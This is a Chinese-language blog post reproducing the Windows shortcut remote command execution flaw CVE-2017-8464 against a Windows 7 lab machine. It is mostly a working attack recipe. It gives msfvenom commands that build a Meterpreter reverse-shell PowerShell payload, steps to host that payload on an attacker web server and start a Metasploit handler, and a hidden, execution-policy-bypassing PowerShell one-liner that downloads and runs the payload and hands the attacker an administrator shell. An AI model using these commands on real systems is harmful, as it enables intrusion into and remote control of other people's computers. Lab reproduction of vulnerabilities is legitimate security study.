CVE-2017-8464 遠端命令執行漏洞復現

Qu_iet發表於2018-01-22

漏洞編號:CVE2017-8464
伺服器版本:Windows 7 專業版
攻擊工具:metasploit
靶機IP:192.168.1.198
攻擊機IP:192.168.1.187(kali)
漏洞復現原理:建立包含惡意執行指令碼的快捷方式並且執行,致使本機中毒。

執行kali,在終端中生成一個反彈shell,執行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

如果目標機是64位主機執行:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

這裡寫圖片描述
進入到【/opt】目錄下,檢視檔案“search.ps1”是否建立成功
這裡寫圖片描述
將建立的“search.ps1”檔案copy到【/var/www/html】目錄下
這裡寫圖片描述
啟動Apache伺服器
這裡寫圖片描述
網頁訪問http://192.168.1.187/search.ps1,檢視是否成功
這裡寫圖片描述
在kali下面啟動MSF軟體輸入命令
這裡寫圖片描述
輸入命令進入【handler】use exploit/multi/handler
指定本機IP 【LHOST】
指定埠【LPORT】
設定返回載荷 set payload windows/x64/meterpreter/reverse_tcp
執行
這裡寫圖片描述
在目標機中建立快捷鍵,在物件的位置中輸入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"

然後點選下一步,快捷名稱命名為:powershell.exe(預設的powershell.exe)
這裡寫圖片描述
執行快捷方式,回到kali攻擊機中,如果msf從監聽模式變成如下形式,表示已經獲取目標機shell
這裡寫圖片描述
執行ls命令,可以發現所列出的檔案在目標機的C盤下
這裡寫圖片描述
執行shell命令,進入靶機,就可以執行cmd命令了(此處已經是管理員許可權,故而不在進行提權)
這裡寫圖片描述

相關文章